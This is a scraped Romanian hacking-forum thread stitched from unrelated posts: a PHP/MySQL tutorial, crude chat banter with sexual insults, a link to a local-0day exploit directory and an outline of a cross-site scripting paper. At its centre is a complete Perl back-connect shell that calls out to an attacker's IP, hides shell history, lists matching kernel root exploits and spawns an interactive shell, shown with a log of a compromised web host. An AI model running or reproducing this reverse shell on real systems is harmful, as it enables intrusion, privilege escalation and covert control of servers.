zbeng

JB era pt SPIRI:))

Notiuni de baza Bazele de date sunt folosite pentru stocarea informatiilor in vederea furnizarii ulterioare in functie de solicitarea primita. MySQL este un sistem de baze de date functional independent. In PHP exista functii pentru toate operatiilor executate asupra bazelor de date MySQL. Administrarea MySQL se poate face din linie de comanda sau folosind browserul si accesand aplicatia numita PHPMyAdmin scrisa in PHP. Cele mai uzuale operatii cu bazele de date sunt: Comanda Semnificatie CREATE creaza o baza de date sau un tabel DROP sterge o baza de date sau un tabel INSERT adauga inregistrari intr-un tabel DELETE sterge inregistrari dintr-un tabel UPDATE updateaza inregistrarile dintr-un tabel SELECT selecteaza un tabel ALTER alterarea unui tabel In MySQL spatiul alocat pe discul serverului este functie de tipul de date. Cateva din tipurile de date folosite in bazele de date MySQL sunt: Tip Semnificatie int() numar intreg 32 biti bigint() numar intreg 64 biti tinyint() numar intreg (-128 la 127 sau 0 la 255) 8 biti mediumint() numar intreg 24 biti smallint() numar intreg 16 biti char() sectiune cu lungime fixa de la 0 la 255 caractere varchar() sectiune cu lungime variabila de la 0 la 255 caractere float() numar mic cu virgula flotanta double numar mare cu virgula flotanta text sir cu maximum 65535 caractere date() data in format YYYY-MM-DD date data in format YYYY-MM-DD HH:MM:SS time ora in format HH:MM:SS Pentru ca baza de date sa fuctioneze mai bine coloanelor li s-au adaugat modificatori de coloana. Tipul de date intregi incep de la valori negative la pozitive. Daca se adauga optiunea UNSIGNED, care este un modificator de coloana, nu vor mai fi valori negative ci vor incepe de la 0. Alti modificatori sunt: AUTO_INCREMENT functioneaza cu orice tip intreg. La fiecare rand nou adaugat in baza de date numarul asociat va fi incrementat. NULL inseamna fara valoare (diferit de spatiu sau zero). NOT NULL inseamna ca orice inregistrare va fi considerata ceva. PRIMARY KEY este rolul primei coloane din tabel, totodata reprezentand elementul de referinta pentru fiecare linie. Crearea tabelelor Bazele de date contin tabele. Aceste tabele sunt similare cu cele din HTML continand rinduri si coloane. Fiecare diviziune se numeste celula sau camp si are anumite propritati. Fiecare tabel din baza de date are un nume sau titlu. Fiecare coloana din tabel are un nume sau titlu. Sintaxa pentru crearea tabelului este: CREATE TABLE nume_tabel (coloana_1, coloana_2,..., coloana_n); Coloanele vor fi separate prin virgula iar fiecare coloana va avea un nume si tip. Pentru a crea un tabel mai intai includem in script fisierul anterior conexiune.php de conectare la baza de date si apoi folosim functia CREATE TABLE. NOTA: In urmatoarele exemple nu voi mai mentiona ca includ acest fisier dar se va subintelege acest lucru de cate ori voi face o operatie cu baza de date. mysql_query este o functie folosita pentru interogarea unei baze de date. Foloseste parametrii: cererea emisa serverului MySQL si identificatorul de acces la baza de date. Exemplu: cream tabelul proba cu 3 coloane. Prima coloana este id de tip PRIMARY KEY de 3 caractere, a doua nume de 20 caractere tip varchar iar a treia prenume de 40 caractere tot varchar. Inainte de a crea tabelul il stergem daca el exista deja. /* urmeaza fisierul create.php */ <?php include "conexiune.php"; $delete="DROP TABLE IF EXISTS proba"; mysql_query($delete, $conexiune); $table="CREATE TABLE proba ( id int(3) NOT NULL AUTO_INCREMENT, nume varchar(20) NOT NULL , prenume varchar(40) NOT NULL , PRIMARY KEY (id)) TYPE=MyISAM"; if(mysql_query($table)){ echo "Tabelul a fost creat"; } else{ echo "Tabelul nu a fost creat"; } mysql_close($conexiune); ?> Functie de valoarea mysql_query este afisat succesul sau insuccesul crearii tabelului. Conectarea la baza de date De cate ori vom lucra cu MySQL va trebui sa ne conectam la baza de date folosind o anume sintaxa. Vom salva aceasta secventa de cod cu numele conexiune.php putand fi folosita ulterior in mai multe scripturi utilizand functia include(). /* urmeaza fiesierul conexiune.php */ <?php $hostname="localhost"; $username="root"; $password="pass"; $database="test"; $conexiune=mysql_connect($hostname,$username,$password) or die ("Nu ma pot conecta la baza de date"); $bazadate=mysql_select_db($database,$conexiune) or die ("Nu gasesc baza de date"); ?> mysql_connect() este functia prin care ne conectam la baza de date cu urmatorii paramatrii: numele serverului, nume utilizator si parola pentru conectarea la baza de date. Variabila $conexiune va avea o valoarea TRUE sau FALSE functie de rezultatul conectarii la serverul MySQL folosind functia mysql_connect(), iar in cazul esuarii va afisa mesajul continut de constructia die(). mysql_select_db este functia care stabileste baza de date la care ne vom conecta, avand ca parametrii numele bazei de date si identificatorul de acces la conexiunea catre serverul MySQL. In mod similar variabila $bazadate folosind functia mysql_select_db va afisa in cazul negasirii bazei de date mesajul continut de die. Puteti modifica variabilele din fisierul conexiune.php in functie de configurarile propriei baze de date: $hostname=adresa serverului, de cele mai multe ori este localhost dar pentru siguranta intrebati administratorul serverului $username=username-ul de conectare la baza de date $password= parola de conectare la baza de date $database=numele bazei de date Dupa ce operatiile dorite au fost executate cu baza de date va trebui sa inchidem conexiunea folosind functia mysql_close() avand ca argument datele de acces la serverul MySQL. mysql_close($conexiune); Anterior am salvat intr-un fisier php numele utilizator si parola care poate parea un lucru riscant. Codul php este interpretat de server si doar rezultatul este afisat, deci datele continute nu vor fi afisate in browser vizitatorului.

aici iti arati poze cu jafu vostru de comp incep eu asat pt ca ma plictisesc

Marius asculta mel asta Cassa loco - Nu esti tu un pic cam prost ce vii cu de astea pe aici;)

se multa la programare

#!/usr/bin/perl # D.O.M TEAM - 2007 # anonyph; arp; ka0x; xarnuz # 2005 - 2007 # BackConnectShell + Rootlab t00l # priv8! # [email]3sk0rbut0@gmail.com[/email] # # Backconnect by data cha0s (modificada por D.O.M) # r00t l4b by D.O.M # # ka0x:~/Desktop # ./nc -lvvp 8600 # listening on [any] 8600 ... # 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA # connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA # ******* ConnectBack Shell ******* # Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3. # 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006 # apache # uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv) # /home/httpd/vhosts/holler.co.uk/httpdocs/datatest # Kernel local: # 2.6.9-022stab078.14-smp # P0sible 3xploit: exp.sh # P0sible 3xploit: krad3 # P0sible 3xploit: newsmp # P0sible 3xploit: ptrace_kmod # P0sible 3xploit: py2 # P0sible 3xploit: ong_bak # P0sible 3xploit: prctl3 # P0sible 3xploit: prctl # P0sible 3xploit: kmdx # P0sible 3xploit: pwned # # sh: no job control in this shell # sh-2.05b$ use IO::Socket; use Socket; use FileHandle; $system = '/bin/bash'; if(!$ARGV[0]) { print "\nBackConnect Shell - D.O.M TEAM\n\n"; print "Usage: perl $0 [IPHOST] [NCPORT]\n"; print "Example: perl $0 82.85.55.21 6850\n\n"; exit; } socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die print "[-] Protocolo Desconocido\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) || die print "[-] Error Socket\n"; print "[+] BackConnect Shell\n"; print "[+] Conectando a $ARGV[0]... \n"; print "[+] Enviando Shell... \n"; print "[+] Conectado. \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "\n******* ConnectBack Shell *******\n\n"; system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd"); # Rootkernel my $khost = `uname -r`; chomp($khost); print "\nKernel local: $khost\n\n"; my %h; $hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] }; $hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] }; $hsd_'ave' = { vuln=>['2.4.19','2.4.20'] }; $hsd_'elflbl' = { vuln=>['2.4.29'] }; $hsd_'elfdump' = { vuln=>['2.4.27'] }; $hsd_'expand_stack' = { vuln=>['2.4.29'] }; $hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] }; $hsd_'kdump' = { vuln=>['2.6.13'] }; $hsd_'km2' = { vuln=>['2.4.18','2.4.22'] }; $hsd_'krad' = { vuln=>['2.6.11'] }; $hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] }; $hsd_'local26' = { vuln=>['2.6.13'] }; $hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] }; $hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] }; $hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] }; $hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] }; $hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] }; $hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] }; $hsd_'ptrace24' = { vuln=>['2.4.9'] }; $hsd_'pwned' = { vuln=>['2.4.','2.6.'] }; $hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] }; $hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] }; $hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] }; $hsd_'remap' = { vuln=>['2.4.'] }; $hsd_'rip' = { vuln=>['2.2.'] }; $hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] }; $hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] }; $hsd_'newsmp' = { vuln=>['2.6.'] }; $hsd_'smpracer' = { vuln=>['2.4.29'] }; $hsd_'loginx' = { vuln=>['2.4.22'] }; $hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] }; $hsd_'prctl' = { vuln=>['2.6.'] }; $hsd_'kmdx' = { vuln=>['2.6.','2.4.'] }; &busca; sub busca { foreach my $key(keys %h){ foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){ if($khost=~/^$kernel/){ chop($kernel) if ($kernel=~/\.$/); print "P0sible 3xploit: ". $key ."\n"; } } } } print "\n"; system 'export TERM=xterm;exec sh -i'; system($system);

carnage ¤ 9. Avatarele nu trebuie sa depaseasca 120x120 si 100KB Semnaturile nu trebuie sa depaseasca 600x150 fa semnatura putin mai mica;)

actualizeazale

http://security-protocols.com/sploits/new_sploits/local-0day/

deci eu is mai critic mi se pare destul de jos nivelul vostru din cate am vazut ca faceti voi la mine dupa 2 luni de antrenamet fac astia mult mai mutl si ami complicat oricum succes

belea:D si unii nu se descurca nici ma car sal prinda dapoi sa faca toate alea

hostingu scz... dar exista http://worlds-highest-website.com/#pos1

flamaaa am videochat cat day=))))

kweee tu esti ala din tufis cunva vrei sa pun dovada=))

nea flama isi baga ghiara in gat 2 romani pana acuma=))

LooooooooooooL ba da nebun mai esti mai flama ))))))))) Nea Flama: nu mai schimba statusu ca team citit esti bulangiu clar ZBENGU: ) ZBENGU: ))))))))))))))))) ZBENGU: ))) Nea Flama: acu scriu pe rst ca esti gay ZBENGU: ))))) ZBENGU: normal ZBENGU: numa in cur imi place sa dau ZBENGU: la femei tampit mai esti dracee=)))))) si eu dau screen ca sa va convingeti=))

Yoshi motive: http://rstzone.net/forum/viewtopic.php?t=7381 http://rstzone.net/forum/viewtopic.php?t=7380

noroc si bun venit si al cat mai multe posturi de calitate

ce ar fi daca la bug_reports ati pune si o casuta unde sa pui o mica descriere sau comentariu

ce sai faci la om a fost si va ramane la fel kwe se vede ca nu a invatat de la ce iai facut ultima data

cein nu era pt cineva in curand era ca sa nu creadaca ca am ideea:D eu am copiat tot siteul si lam pus al mine pe hosting

deci: 1 acolo nu zice cei ideea mea 2 daca intrai vedeati ca acolo pune WHWS va este prezentat de catre artistul frontend Jens Meiert si secretul „Flying Standardistas Club“. Design: Alessandro Lettieri. Translaþie: Via Thomas Schaller (Ferienhaus online). care e fix ca cel original asa ca 3 after eu alm luat pe ala in romana )

http://zbeng.inviho.com/astay.htm astept pareri

Written by Gunter Ollmann Contents: * Abstract * Introduction * Code Insertion * Malicious Code * Cross-Site Scripting * Understanding Code Insertion o Inline Scripting o Forced Error Responses o Non <SCRIPT> Events o Javascript Entities o Typical Payloads Formatting * Bypassing Anti-CSS Filters * Web Integration o The Flash! Attack * The Impact * Vulnerability Checking * Put It All Together * Defending Against the Attack o Solutions for Users o Solutions for Developers and Organisations + Limit Server Responses + Enforce Response Lengths + HTTP Referer + Embedded Files and Objects + HTTP POST not GET + Cookie Inspection + URL Session Identifier * Character Sets * Dangerous Content * Encode output based upon input parameters o Filter input parameters for special characters o Filter output based upon input parameters for special characters * References il gasiti aici :http://www.technicalinfo.net/papers/CSS.html

da tie